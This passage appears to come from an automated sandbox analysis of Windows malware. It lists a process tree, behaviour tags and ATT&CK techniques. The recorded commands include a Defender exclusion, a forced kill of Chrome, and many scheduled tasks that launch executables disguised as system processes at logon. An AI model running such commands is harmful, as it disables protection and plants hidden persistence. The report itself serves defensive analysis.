C:\Users\Admin\Documents\P0iVUVC5LXsJ.exe
"C:\Users\Admin\Documents\P0iVUVC5LXsJ.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4992

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:6612

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7128

C:\Users\Admin\Documents\74qACLReRlGN.exe
"C:\Users\Admin\Documents\74qACLReRlGN.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:4720

C:\Users\Admin\Documents\74qACLReRlGN.exe
"C:\Users\Admin\Documents\74qACLReRlGN.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6556

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
5⤵
- Suspicious use of SetWindowsHookEx
PID:4804

C:\Users\Admin\Documents\vsVXhkLl7qyX.exe
"C:\Users\Admin\Documents\vsVXhkLl7qyX.exe"
5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:5720

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wild-Dew"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2464

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:504

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:5860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 580
1⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:6044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4284

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6872

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6904

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{38c7dc12-57cd-254c-a685-805254d3815f}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:6980

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"
2⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:4788

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5584

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:6952

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6404

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:4756

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4212

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3476

C:\Users\Admin\AppData\Local\Temp\141B.tmp.exe
C:\Users\Admin\AppData\Local\Temp\141B.tmp.exe
1⤵
- Suspicious use of SetWindowsHookEx
PID:5748

C:\Users\Admin\AppData\Local\Temp\1CE6.tmp.exe
C:\Users\Admin\AppData\Local\Temp\1CE6.tmp.exe
1⤵
- Suspicious use of SetThreadContext
PID:6204

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
2⤵
PID:6816

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
2⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\216C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\216C.tmp.exe
1⤵
- Suspicious use of SetThreadContext
PID:6980

C:\Users\Admin\AppData\Local\Temp\216C.tmp.exe
"{path}"
2⤵
PID:10220

C:\Users\Admin\AppData\Local\Temp\216C.tmp.exe
"{path}"
2⤵
PID:10228

C:\Users\Admin\AppData\Local\Temp\216C.tmp.exe
"{path}"
2⤵
PID:8800

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\odt\sppsvc.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:1772

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "8CEH4UI8M" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\8CEH4UI8M.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:3296

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Boot\ro-RO\SearchUI.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:4636

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "Idle" /sc ONLOGON /tr "'C:\Documents and Settings\Idle.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:6508

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "chrome" /sc ONLOGON /tr "'C:\PerfLogs\chrome.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:6296

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\PerfLogs\sppsvc.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:6260

C:\PerfLogs\sppsvc.exe
"C:\PerfLogs\sppsvc.exe"
3⤵
- Suspicious use of SetThreadContext
PID:3644

C:\PerfLogs\sppsvc.exe
"{path}"
4⤵
PID:10120

C:\Users\Admin\AppData\Local\Temp\2303.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2303.tmp.exe
1⤵
- Loads dropped DLL
PID:2412

C:\Users\Admin\AppData\Local\Temp\2565.tmp.exe
C:\Users\Admin\AppData\Local\Temp\2565.tmp.exe
1⤵
PID:4916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 532
2⤵
- Program crash
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 508
2⤵
- Program crash
PID:6160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 792
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4480

C:\Users\Admin\AppData\Local\Temp\3583.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3583.tmp.exe
1⤵
- Suspicious use of SetThreadContext
PID:4464

C:\Users\Admin\AppData\Local\Temp\3583.tmp.exe
"{path}"
2⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\397C.tmp.exe
C:\Users\Admin\AppData\Local\Temp\397C.tmp.exe
1⤵
- Suspicious use of SetThreadContext
PID:5852

C:\Users\Admin\AppData\Local\Temp\397C.tmp.exe
"{path}"
2⤵
- Adds Run key to start application
- Drops file in Program Files directory
PID:4152

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\fontdrvhost.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:8424

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "chrome" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\chrome.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:8644

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "chrome" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Gadgets\chrome.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:8884

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "MicrosoftEdgeCP" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\MicrosoftEdgeCP.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:9048

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "MicrosoftEdgeCP" /sc ONLOGON /tr "'C:\Documents and Settings\MicrosoftEdgeCP.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:9132

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\odt\dllhost.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:4788

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "MicrosoftEdgeCP" /sc ONLOGON /tr "'C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\MicrosoftEdgeCP.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:8524

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\PerfLogs\explorer.exe'" /rl HIGHEST /f
3⤵
- Creates scheduled task(s)
PID:8892

C:\PerfLogs\explorer.exe
"C:\PerfLogs\explorer.exe"
3⤵
- Suspicious use of SetThreadContext
PID:4544

C:\PerfLogs\explorer.exe
"{path}"
4⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:7280

C:\Users\Admin\AppData\Local\Temp\3D46.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3D46.tmp.exe
1⤵
PID:5072

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5888

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5908

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6460

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5732

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6644

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:5520

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1676

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6136

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1520

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7568

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6676

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7264

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:684

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x408
1⤵
PID:1864

C:\Users\Admin\AppData\Roaming\fbwfgas
C:\Users\Admin\AppData\Roaming\fbwfgas
1⤵
- Suspicious use of SetThreadContext
PID:10112

C:\Users\Admin\AppData\Roaming\fbwfgas
C:\Users\Admin\AppData\Roaming\fbwfgas
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:5816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9408

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9504

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3236

C:\Users\Admin\AppData\Local\Temp\is-AUBFO.tmp\iGO0cC4S3kj3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AUBFO.tmp\iGO0cC4S3kj3.tmp" /SL5="$50732,3376292,58368,C:\Users\Admin\Documents\iGO0cC4S3kj3.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:10428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:676

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9380

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6968

C:\Users\Admin\AppData\Roaming\fbwfgas
C:\Users\Admin\AppData\Roaming\fbwfgas
1⤵
- Suspicious use of SetThreadContext
PID:10764

C:\Users\Admin\AppData\Roaming\fbwfgas
C:\Users\Admin\AppData\Roaming\fbwfgas
2⤵
PID:4244

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:10688

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:10396

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7648

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery